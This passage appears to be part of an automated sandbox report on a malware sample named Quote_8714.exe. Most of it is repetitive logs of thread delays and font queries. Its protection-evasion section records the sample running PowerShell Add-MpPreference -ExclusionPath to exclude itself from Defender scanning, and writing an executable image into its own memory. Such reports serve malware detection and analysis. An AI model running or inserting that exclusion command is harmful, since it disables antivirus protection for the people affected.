                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 97734Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 97625Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 97515Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 97406Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 97296Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 97185Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 97078Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 96968Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 96859Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 96750Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 96637Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 96530Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 96421Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 96287Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 96159Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 95953Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 95799Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 95672Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 95562Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 95453Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 95343Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 95234Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 95125Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 95015Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 94906Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 94796Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 94687Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 94577Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeThread delayed: delay time: 94468Jump to behavior
                        Source: Quote_8714.exe, 00000005.00000002.2946197413.0000000005F97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeMemory written: C:\Users\user\Desktop\Quote_8714.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeProcess created: C:\Users\user\Desktop\Quote_8714.exe "C:\Users\user\Desktop\Quote_8714.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Users\user\Desktop\Quote_8714.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Quote_8714.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
